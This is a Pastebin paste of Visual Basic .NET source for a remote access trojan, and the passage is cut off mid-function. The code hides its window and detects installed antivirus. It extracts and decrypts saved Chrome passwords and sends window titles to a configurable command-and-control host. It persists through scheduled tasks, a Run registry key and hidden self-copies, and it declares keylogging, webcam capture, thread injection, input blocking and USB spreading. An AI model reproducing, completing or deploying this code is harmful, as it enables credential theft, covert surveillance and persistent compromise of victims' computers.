Guest User

Untitled

a guest
Oct 21st, 2016
273
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 122.83 KB | None | 0 0
  1. Public Enum ThreadAccess As Integer
  2. TERMINATE = (&H1)
  3. SUSPEND_RESUME = (&H2)
  4. GET_CONTEXT = (&H8)
  5. SET_CONTEXT = (&H10)
  6. SET_INFORMATION = (&H20)
  7. QUERY_INFORMATION = (&H40)
  8. SET_THREAD_TOKEN = (&H80)
  9. IMPERSONATE = (&H100)
  10. DIRECT_IMPERSONATION = (&H200)
  11. End Enum
  12. <System.Runtime.InteropServices.DllImport("user32")>
  13. Public Shared Function GetAsyncKeyState(ByVal xxx As System.Windows.Forms.Keys) As Short
  14. End Function
  15. Public Delegate Function CallBack(ByVal hwnd As Integer, ByVal lParam As Integer) As Boolean
  16. Public Declare Function EnumWindows Lib "user32" (ByVal Adress As CallBack, ByVal y As Integer) As Integer
  17. Public Declare Function IsWindowVisible Lib "user32.dll" (ByVal hwnd As IntPtr) As Boolean
  18. Private Const SW_HIDE As Integer = 0
  19. Private Const SW_RESTORE As Integer = 9
  20. Private hWnd As Integer
  21. Public selectedIndex As Integer
  22. Private ActiveWindows As New System.Collections.ObjectModel.Collection(Of IntPtr)
  23. <DllImport("User32")> Private Shared Function ShowWindowe(ByVal hwnd As Integer, ByVal nCmdShow As Integer) As Integer
  24. End Function
  25. Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Integer, ByVal lpWindowText As String, ByVal cch As Integer) As Integer
  26. Public Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As ThreadAccess, ByVal bInheritHandle As Boolean, ByVal dwThreadId As UInteger) As IntPtr
  27. Public Declare Function SuspendThread Lib "kernel32.dll" (ByVal hThread As IntPtr) As UInteger
  28. Public Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As IntPtr) As UInteger
  29. Public Declare Function CloseHandle Lib "kernel32.dll" (ByVal hHandle As IntPtr) As Boolean
  30. Public GetProcesses() As Process
  31. Private strUninstallStrings() As String
  32. Private NewUninstallStrArr
  33. Public Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal key As Integer) As Integer
  34. Private Declare Function mmciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Integer, ByVal hwndCallback As Integer) As Integer
  35. Dim TextBox13 As New TextBox
  36. Dim TextBox12 As New TextBox
  37. Dim TextBox8 As New TextBox
  38. Dim TextB As New TextBox
  39. Dim zoooom As New TextBox
  40. Private Declare Function SHEmptyRecycleBin Lib "shell32.dll" Alias "SHEmptyRecycleBinA" (ByVal hWnd As Int32, ByVal pszRootPath As String, ByVal dwFlags As Int32) As Int32
  41. Private Declare Function SHUpdateRecycleBinIcon Lib "shell32.dll" () As Int32
  42. Private Const SHERB_NOCONFIRMATION = &H1
  43. Private Const SHERB_NOPROGRESSUI = &H2
  44. Private Const SHERB_NOSOUND = &H4
  45. Dim PersistThread As Thread
  46. Public WithEvents Comet As New k
  47. Public Yy As String = "|U|"
  48. Public HOST As String
  49. Public port As Integer
  50. Public name As String
  51.  
  52. Public cmds As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\i" + System.Environment.UserName + ".inf"
  53. Dim ewfwasefds As New TextBox
  54. Dim ewfwasefds1 As New TextBox
  55. Dim ewfwasefds2 As New TextBox
  56. Public copyse As Boolean = 0
  57. Public Ver As String = "0.1.4.0"
  58. Public virustotal As String = 0
  59. Dim Devices As Object, Grafikadapter As String, RegionA As String = "SELECT * FROM Win32_VideoController"
  60. Public task As String = 0
  61. Public proh As String = 0
  62. Public avira As String = 0
  63. Private iwE As String = Environment.GetEnvironmentVariable("windir", EnvironmentVariableTarget.Machine)
  64. Public av As String = 0
  65. Public css, tcs, dta, hidme, melt, temp1, temp2, tr1, sys1, sys2, tr2, CheckBox31, TextBox11, CheckBox32, CheckBox28 As Object
  66. Const key As String = "pSILlzCez34GFHGHwXBSrQ1Vb72t6bIXyedstKRzAHJklNNL94gD8hIi9FwLiiVlr"
  67. Public a1 As String = 0
  68. Public a2 As String = 0
  69. Public a3 As String = 0
  70. Public a4 As String = 0
  71. Public a5 As String = 0
  72. Public a6 As String = 0
  73. Public a7 As String = 0
  74. Public a8 As String = 0
  75. Public a9 As String = 0
  76. Public Declare Function SendMessageW Lib "user32.dll" (ByVal hWnd As IntPtr, ByVal Msg As Integer, ByVal wParam As IntPtr, ByVal lParam As IntPtr) As IntPtr
  77. Const TASKBAR_SHOW As Integer = &H40
  78. Const TASKBAR_HIDE As Integer = &H80
  79. Private Const SETDESKWALLPAPER = 20
  80. Private Const UPDATEINIFILE = &H1
  81. Public tictoc As Integer = 0
  82. Delegate Sub chatappd(ByVal data1 As String, ByVal data2 As String, ByVal data3 As String)
  83. Public MutexX As String = "LIUHLIpiuhFRiuhjUFGIRkufhrifUYF"
  84. Public Priss As String = 0
  85. Public EXENAME As String = "68465df648rg6684e62dz5d5z8g4tg4t84yj6ki4jr"
  86. Public AddREg As String = 0
  87. Public Myinstal As String = "AppData"
  88. Public Usb11 As String = 0
  89. Public proz As String = 0
  90. Public kl As New VIOD
  91. Dim tt As New AntiTaskManager
  92. Public us As String = 0
  93. Public proa As String = 0
  94. Public proE As String = 0
  95. Public pror As String = 0
  96. Private Const SW_SHOWNORMAL As Integer = 1
  97. Private Const SW_SHOWMINIMIZED As Integer = 2
  98. Private Declare Function ShowWindow Lib "user32" (ByVal handle As IntPtr, ByVal nCmdShow As Integer) As Integer
  99. Private Const SW_SHOWMAXIMIZED As Integer = 3
  100. Public No As String = 0
  101. Private Declare Function BlockInput Lib "user32" Alias "BlockInput" (ByVal fBlock As Integer) As Integer
  102. Private Declare Function ShowCursor Lib "user32" (ByVal lShow As Long) As Long
  103. Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer
  104. Public sernam As String
  105. Public addtos As Boolean = 0
  106. Public StartupKey As String
  107. Public melts As Boolean = 0
  108. Public pw As String
  109. Public cap As New r
  110. Public caa As New CRDP1
  111. Private culture As String = CultureInfo.CurrentCulture.EnglishName
  112. Private country As String = culture.Substring(culture.IndexOf("("c) + 1, culture.LastIndexOf(")"c) - culture.IndexOf("("c) - 1)
  113. Private Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As IntPtr
  114. Public Declare Function apiBlockInput Lib "user32" Alias "BlockInput" (ByVal fBlock As Integer) As Integer
  115. Public Declare Function SwapMouseButton Lib "user32" Alias "SwapMouseButton" (ByVal bSwap As Long) As Long
  116. Private Declare Auto Sub SendMessage Lib "user32.dll" (ByVal hWnd As Integer, ByVal msg As UInt32, ByVal wParam As UInt32, ByVal lparam As Integer)
  117. Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Integer, ByVal hWndInsertAfter As Integer, ByVal x As Integer, ByVal y As Integer, ByVal cx As Integer, ByVal cy As Integer, ByVal wFlags As Integer) As Integer
  118. Dim taskBar As Integer = FindWindow("Shell_traywnd", "")
  119. Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Integer
  120. Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpCommandString As String, ByVal lpReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  121. Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As System.IntPtr, ByVal lpString As System.Text.StringBuilder, ByVal cch As Integer) As Integer
  122. Private makel As String
  123. Dim text1, text2, namev, flder, RG As String
  124. Const spl = "abccba"
  125. Dim PictureBox1 As Windows.Forms.PictureBox
  126. Dim streamWebcam As Boolean = False
  127. Public loggg As String
  128. Private Declare Function SendCamMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Int32, ByVal Msg As Int32, ByVal wParam As Int32, <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.AsAny)> ByVal lParam As Object) As Int32
  129. Public xxx As Integer
  130. Dim id As String = "76487-337-8429955-22614"
  131. Private pfnStartAddr As Integer
  132. Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (
  133. ByVal lpLibFileName As String) As Integer
  134. Public Declare Function GetProcAddress Lib "kernel32" (
  135. ByVal hModule As Integer, ByVal lpProcName As String) As Integer
  136. Public screamx As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + ".wav"
  137. Public scream As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + ".ini"
  138. Public hid As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + ".E"
  139. Public S762 As String = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
  140. Public Declare Function CreateRemoteThread Lib "kernel32" (
  141. ByVal hProcess As Integer,
  142. ByVal lpThreadAttributes As Integer,
  143. ByVal dwStackSize As Integer,
  144. ByVal lpStartAddress As Integer,
  145. ByVal lpParameter As Integer,
  146. ByVal dwCreationFlags As Integer,
  147. ByRef lpThreadId As Integer) As Integer
  148. Public ooo As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + ".jpg"
  149. Public LogsPathsoo As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + ".log"
  150. 'Public HostPort As String = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" + System.Environment.UserName + ".Microsoft"
  151. Public Structure CLIENT_ID
  152. Dim UniqueProcess As Long
  153. Dim UniqueThread As Long
  154. End Structure
  155. Private Declare Function RtlCreateUserThread Lib "ntdll.dll" (ByVal hProcess As Long,
  156. ByRef ThreadSecurityDescriptor As Integer,
  157. ByVal CreateSuspended As Long,
  158. ByVal ZeroBits As Long,
  159. ByVal MaximumStackSize As Long,
  160. ByVal CommittedStackSize As Long,
  161. ByVal StartAddress As Long,
  162. ByVal Parameter As Long,
  163. ByRef hThread As Long,
  164. ByRef ClientId As CLIENT_ID) As Long
  165. Private Function GetCaption() As String
  166. Dim Caption As New System.Text.StringBuilder(256)
  167. Dim hWnd As IntPtr = GetForegroundWindow()
  168. GetWindowText(hWnd, Caption, Caption.Capacity)
  169. Return Caption.ToString()
  170. End Function
  171. Private Sub Form1_FormClosed(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosedEventArgs)
  172. On Error Resume Next
  173. Process.Start(Application.ExecutablePath)
  174. End Sub
  175. Private Sub Form1_FormClosing(ByVal sender As Object, ByVal e As System.Windows.Forms.FormClosingEventArgs)
  176. On Error Resume Next
  177. Process.Start(Application.ExecutablePath)
  178. End Sub
  179. Function getanti()
  180. Dim antivirus As String
  181. Dim procList() As Process = Process.GetProcesses()
  182. Dim i As Integer = 0
  183. Do
  184. Dim strProcName As String = procList(i).ProcessName
  185. If strProcName = "ekrn" Then
  186. antivirus = "NOD32"
  187. ElseIf strProcName = "avgcc" Then
  188. antivirus = "AVG"
  189. ElseIf strProcName = "avgnt" Then
  190. antivirus = "Avira"
  191. ElseIf strProcName = "QHWatchdog" Then
  192. antivirus = "Total Security 360"
  193.  
  194. ElseIf strProcName = "ahnsd" Then
  195. antivirus = "AhnLab-V3"
  196. ElseIf strProcName = "bdss" Then
  197. antivirus = "BitDefender"
  198. ElseIf strProcName = "bdv" Then
  199. antivirus = "ByteHero"
  200. ElseIf strProcName = "clamav" Then
  201. antivirus = "ClamAV"
  202. ElseIf strProcName = "fpavserver" Then
  203. antivirus = "F-Prot"
  204. ElseIf strProcName = "fssm32" Then
  205. antivirus = "F-Secure"
  206. ElseIf strProcName = "avkcl" Then
  207. antivirus = "GData"
  208. ElseIf strProcName = "engface" Then
  209. antivirus = "Jiangmin"
  210. ElseIf strProcName = "avp" Then
  211. antivirus = "Kaspersky"
  212. ElseIf strProcName = "updaterui" Then
  213. antivirus = "McAfee"
  214. ElseIf strProcName = "msmpeng" Then
  215. antivirus = "microsoft security essentials"
  216. ElseIf strProcName = "zanda" Then
  217. antivirus = "Norman"
  218. ElseIf strProcName = "npupdate" Then
  219. antivirus = "nProtect"
  220. ElseIf strProcName = "inicio" Then
  221. antivirus = "Panda"
  222. ElseIf strProcName = "sagui" Then
  223. antivirus = "Prevx"
  224. ElseIf strProcName = "savservice" Then
  225. antivirus = "Sophos"
  226. ElseIf strProcName = "saswinlo" Then
  227. antivirus = "SUPERAntiSpyware"
  228. ElseIf strProcName = "spbbcsvc" Then
  229. antivirus = "Symantec"
  230. ElseIf strProcName = "thd32" Then
  231. antivirus = "TheHacker"
  232. ElseIf strProcName = "ufseagnt" Then
  233. antivirus = "TrendMicro"
  234. ElseIf strProcName = "dllhook" Then
  235. antivirus = "VBA32"
  236. ElseIf strProcName = "sbamtray" Then
  237. antivirus = "VIPRE"
  238. ElseIf strProcName = "vrmonsvc" Then
  239. antivirus = "ViRobot"
  240. ElseIf strProcName = "dllhook" Then
  241. antivirus = "VBA32"
  242. ElseIf strProcName = "vbcalrt" Then
  243. antivirus = "VirusBuster"
  244. ElseIf strProcName = "aswUpdSv" Then
  245. antivirus = "Avast"
  246. Else
  247. antivirus = "Not Found"
  248. End If
  249. Dim iProcID As Integer = procList(i).Id
  250. i = i + 1
  251. Loop Until (antivirus <> "Not Found" Or i > procList.Length - 1)
  252. If i > procList.Length - 1 Then
  253. antivirus = "Not Found"
  254. End If
  255. Return antivirus
  256. End Function
  257. Public Function GetActiveWindows() As ObjectModel.Collection(Of IntPtr)
  258. AC = ""
  259. EnumWindows(AddressOf Enumerator, 0)
  260. Return ActiveWindows
  261. End Function
  262. Private Function Enumerator(ByVal hwnd As IntPtr, ByVal lParam As Integer) As Boolean
  263. Dim text As String = Space(Int16.MaxValue)
  264. If IsWindowVisible(hwnd) Then
  265. GetWindowText(hwnd, text, Int16.MaxValue)
  266. AC = text
  267. Dim sl As String = "ProcessSplit"
  268. Dim RFC$
  269. RFC = AC + sl
  270. Comet.Send("ACs" & Yy & RFC)
  271. End If
  272. Return True
  273. End Function
  274.  
  275. Public Sub GetChrome()
  276. Dim datapath As String = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\Google\Chrome\User Data\Default\Login Data"
  277. Try
  278. zoooom.Text = ""
  279. Dim SQLDatabase = New SQLiteHandler(datapath)
  280. SQLDatabase.ReadTable("logins")
  281.  
  282. If File.Exists(datapath) Then
  283.  
  284. Dim host, user, pass As String
  285.  
  286. For i = 0 To SQLDatabase.GetRowCount() - 1 Step 1
  287. host = SQLDatabase.GetValue(i, "origin_url")
  288. user = SQLDatabase.GetValue(i, "username_value")
  289. pass = Decrypt(System.Text.Encoding.Default.GetBytes(SQLDatabase.GetValue(i, "password_value")))
  290.  
  291. If (user <> "") And (pass <> "") Then
  292. cPass = ("============ Chrome ==============" & vbNewLine & "link: ---> " & host & vbNewLine & "Account: ---> " & user & vbNewLine & "password: ---> " & pass & vbNewLine & "=============================" & vbNewLine _
  293. & vbNewLine & " ")
  294. zoooom.Text += cPass
  295. End If
  296. Next
  297.  
  298. End If
  299. Catch e As Exception
  300. MsgBox(e.ToString)
  301. End Try
  302. End Sub
  303. Public Function GenerateOperatingSystema() As String
  304. Dim xa As String
  305. If Microsoft.Win32.Registry.LocalMachine.OpenSubKey("Hardware\Description\System\CentralProcessor\0").GetValue("Identifier").ToString.Contains("x64") Then
  306. xa = "32 Bit"
  307. Else
  308. xa = "64 Bit"
  309. End If
  310. Return xa
  311. End Function
  312. Public Function GenerateOperatingSystem() As String
  313. Dim xa As String
  314. If Microsoft.Win32.Registry.LocalMachine.OpenSubKey("Hardware\Description\System\CentralProcessor\0").GetValue("Identifier").ToString.Contains("x86") Then
  315. xa = "32 Bit"
  316. Else
  317. xa = "64 Bit"
  318. End If
  319. Return xa
  320. End Function
  321. Sub screamhelp()
  322. Me.FormBorderStyle = Windows.Forms.FormBorderStyle.FixedToolWindow
  323. Me.Hide()
  324. Me.ShowInTaskbar = False
  325. Me.ShowIcon = False
  326.  
  327.  
  328. 'My.Settings.Reload()
  329. If x60 Then
  330. If GenerateOperatingSystem() = "32 Bit" Then
  331. 'MsgBox("1")
  332. Else
  333. End
  334. End If
  335. End If
  336. If x61 Then
  337. If GenerateOperatingSystema() = "64 Bit" Then
  338. 'MsgBox("1")
  339. Else
  340. End
  341. End If
  342. End If
  343.  
  344. If My.Settings.ho = "" Then
  345. HOST = x1
  346. Else
  347. Dim TOFc1$ = My.Settings.ho
  348. HOST = TOFc1
  349.  
  350. End If
  351.  
  352. If My.Settings.po = "" Then
  353. port = x2
  354. Else
  355. Dim TOFc2$ = My.Settings.po
  356. port = TOFc2
  357.  
  358. End If
  359.  
  360.  
  361.  
  362.  
  363. If File.Exists(scream) Then
  364. Dim XKL As String
  365. XKL = System.IO.File.ReadAllText(scream)
  366. name = XKL
  367. If XKL = "" Then name = x3
  368. Else
  369. name = x3
  370. End If
  371.  
  372. TextBox4.Text = name
  373.  
  374. copyse = x4
  375. sernam = x5
  376. addtos = x6
  377. StartupKey = x7
  378. melts = x8
  379. pw = x9
  380. task = x10
  381. us = x11
  382. proE = x12
  383. proh = x13
  384. proa = x14
  385. proz = x15
  386. pror = x16
  387. virustotal = x17
  388. Try
  389. MutexX = x18
  390. Priss = x19
  391. EXENAME = x20
  392. AddREg = x21
  393. Myinstal = x22
  394. avira = x23
  395. dta = x24
  396. css = x25
  397. tcs = x26
  398. namev = x27
  399. flder = x28
  400. hidme = x29
  401. melt = x30
  402. temp1 = x31
  403. temp2 = x32
  404. tr1 = x33
  405. sys1 = x34
  406. sys2 = x35
  407. tr2 = x36
  408. Usb11 = x37
  409. a1 = x38
  410. a2 = x39
  411. a3 = x40
  412. a4 = x41
  413. a5 = x42
  414. a6 = x43
  415. av = x44
  416. a7 = x45
  417. a8 = x46
  418. a9 = x47
  419. CheckBox31 = x48
  420. TextBox11 = x49
  421. CheckBox32 = x50
  422. CheckBox28 = x51
  423. TextBox13.Text = x52
  424. TextBox8.Text = x53
  425. TextBox12.Text = x54
  426. Catch ex As Exception
  427. End Try
  428. If x57 Then
  429. TextBox3.Text += 1
  430. My.Computer.FileSystem.WriteAllText(hid, TextBox3.Text, False)
  431. If TextBox3.Text >= x58 Then
  432. Else
  433. End
  434. End If
  435. End If
  436. If CheckBox31 Then
  437. TextBox2.Text = TextBox11
  438. Threading.Thread.Sleep(TextBox2.Text)
  439. End If
  440. If Priss Then
  441. PersistThread = New Thread(AddressOf Persist)
  442. PersistThread.IsBackground = True : PersistThread.Start(StartupKey)
  443. End If
  444. Try
  445. System.Threading.Mutex.OpenExisting(MutexX) : End
  446. Catch
  447. Dim mutex As New Mutex(False, MutexX)
  448. End Try
  449. If CheckBox28 Then
  450. Try
  451. Dim d As String
  452.  
  453. d = System.Environment.UserName
  454. TextBox12.Text = TextBox12.Text.Replace("?", d)
  455. If File.Exists(TextBox12.Text) Then
  456. Else
  457. If x55 = "" Then
  458. File.Copy(Application.ExecutablePath, TextBox12.Text)
  459. System.IO.File.SetAttributes(TextBox12.Text, IO.FileAttributes.Hidden)
  460. If x56 Then
  461. Shell("schtasks /create /sc minute /" + TextBox8.Text + " /tn " + TextBox13.Text + " /tr " & TextBox12.Text, AppWinStyle.Hide)
  462.  
  463. Else
  464. Shell("SchTasks /Create /SC DAILY /TN " + TextBox13.Text + " /TR " + TextBox12.Text + " /" + TextBox8.Text, AppWinStyle.Hide)
  465.  
  466. End If
  467. Else
  468. Dim ds As String
  469.  
  470. ds = System.Environment.UserName
  471. x55 = x55.Replace("?", ds)
  472. System.IO.Directory.CreateDirectory(x55)
  473. File.Copy(Application.ExecutablePath, TextBox12.Text)
  474. System.IO.File.SetAttributes(TextBox12.Text, IO.FileAttributes.Hidden)
  475. If x56 Then
  476. Shell("schtasks /create /sc minute /" + TextBox8.Text + " /tn " + TextBox13.Text + " /tr " & TextBox12.Text, AppWinStyle.Hide)
  477.  
  478. Else
  479. Shell("SchTasks /Create /SC DAILY /TN " + TextBox13.Text + " /TR " + TextBox12.Text + " /" + TextBox8.Text, AppWinStyle.Hide)
  480.  
  481. End If
  482. End If
  483. End If
  484. Catch ex As Exception
  485. End Try
  486. End If
  487. If CheckBox32 Then
  488. Try
  489. Dim StartupKey As String = namev
  490. Dim regKey As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("software\microsoft\windows\currentversion\run", True)
  491. regKey.SetValue(StartupKey, Application.ExecutablePath, Microsoft.Win32.RegistryValueKind.String) : regKey.Close()
  492. Catch : End Try
  493. End If
  494. Me.FormBorderStyle = Windows.Forms.FormBorderStyle.FixedToolWindow
  495. Me.ShowInTaskbar = False
  496. Me.Hide()
  497. Me.Visible = False
  498. kl.Start()
  499. name = name & "_" & HWD()
  500.  
  501. Timer2.Enabled = True
  502. If a9 Then
  503. Timer17.Start()
  504. End If
  505. If a8 Then
  506. Timer16.Start()
  507. End If
  508. If a7 Then
  509. Timer15.Start()
  510. End If
  511. If av Then
  512. AVG()
  513. End If
  514. If a1 Then
  515. Timer9.Start()
  516. End If
  517. If a2 Then
  518. Timer10.Start()
  519. End If
  520. If a3 Then
  521. Timer11.Start()
  522. End If
  523. If a4 Then
  524. Timer12.Start()
  525. End If
  526. If a5 Then
  527. Timer13.Start()
  528. End If
  529. If a6 Then
  530. Timer14.Start()
  531. End If
  532. If Usb11 Then
  533. Timer8.Start()
  534. End If
  535. If avira Then
  536. Dim T As New Threading.Thread(AddressOf BA)
  537. T.IsBackground = True
  538. T.Start()
  539. End If
  540. If us Then
  541. Dim usb As New USB
  542. usb.Start()
  543. End If
  544. If virustotal Then
  545. virustotal1.Block("virustotal")
  546. End If
  547. If pror Then
  548. Timer7.Start()
  549. End If
  550. If proh Then
  551. Timer4.Start()
  552. End If
  553. If proz Then
  554. Timer6.Start()
  555. End If
  556. If proa Then
  557. Timer5.Start()
  558. End If
  559. If proE Then
  560. Timer3.Start()
  561. End If
  562. If hidme Then
  563. File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden)
  564. End If
  565. Dim ProgramFiles1 As String = GetFolderPath(SpecialFolder.Programs)
  566. If sys1 Then
  567. Directory.CreateDirectory(ProgramFiles1 & "\" & flder)
  568. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev Then
  569. If File.Exists(Path.GetTempPath & "melt.txt") Then
  570. End If
  571. Else
  572. If File.Exists(Path.GetTempPath & "melt.txt") Then
  573. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  574. End If
  575. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev) Then
  576. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev) : Catch : End Try
  577. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev)
  578. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  579. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev)
  580.  
  581. Else
  582. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev)
  583. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  584. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & flder & "\" & namev)
  585. End
  586. End If
  587. End If
  588. End If
  589. '
  590. If sys2 Then
  591.  
  592. Directory.CreateDirectory(ProgramFiles1 & "\" & tr2)
  593. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev Then
  594. If File.Exists(Path.GetTempPath & "melt.txt") Then
  595. End If
  596. Else
  597. If File.Exists(Path.GetTempPath & "melt.txt") Then
  598. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  599. End If
  600. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev) Then
  601. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev) : Catch : End Try
  602. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev)
  603. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  604. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev)
  605.  
  606. Else
  607. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev)
  608. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  609. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Programs) & "\" & tr2 & "\" & namev)
  610. End
  611. End If
  612. End If
  613. End If
  614.  
  615. Dim temp As String = GetFolderPath(SpecialFolder.Templates)
  616. If temp1 Then
  617. Directory.CreateDirectory(temp & "\" & flder)
  618. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev Then
  619. If File.Exists(Path.GetTempPath & "melt.txt") Then
  620. End If
  621. Else
  622. If File.Exists(Path.GetTempPath & "melt.txt") Then
  623. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  624. End If
  625. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev) Then
  626. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev) : Catch : End Try
  627. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev)
  628. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  629. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev)
  630.  
  631. Else
  632. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev)
  633. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  634. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & flder & "\" & namev)
  635. End
  636. End If
  637. End If
  638. End If
  639. If temp2 Then
  640. Directory.CreateDirectory(temp & "\" & tr1)
  641. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev Then
  642. If File.Exists(Path.GetTempPath & "melt.txt") Then
  643. End If
  644. Else
  645. If File.Exists(Path.GetTempPath & "melt.txt") Then
  646. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  647. End If
  648. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev) Then
  649. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev) : Catch : End Try
  650. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev)
  651. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  652. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev)
  653.  
  654. Else
  655. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev)
  656. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  657. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.Templates) & "\" & tr1 & "\" & namev)
  658. End
  659. End If
  660. End If
  661. End If
  662.  
  663. Dim appData As String = GetFolderPath(SpecialFolder.ApplicationData)
  664. If dta Then
  665. Directory.CreateDirectory(appData & "\" & flder)
  666. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev Then
  667. If File.Exists(Path.GetTempPath & "melt.txt") Then
  668. End If
  669. Else
  670. If File.Exists(Path.GetTempPath & "melt.txt") Then
  671. Try : IO.File.Delete(Path.GetTempPath & "melt.txt") : Catch : End Try
  672. End If
  673. If File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev) Then
  674. Try : IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev) : Catch : End Try
  675. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev)
  676. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  677. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev)
  678.  
  679. Else
  680. IO.File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev)
  681. IO.File.WriteAllText(Path.GetTempPath & "melt.txt", Application.ExecutablePath)
  682. Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & flder & "\" & namev)
  683. End
  684. End If
  685. End If
  686. End If
  687. If css Then
  688. Directory.CreateDirectory(appData & "\" & tcs)
  689. If Application.ExecutablePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\" & tcs & "\" & namev Then
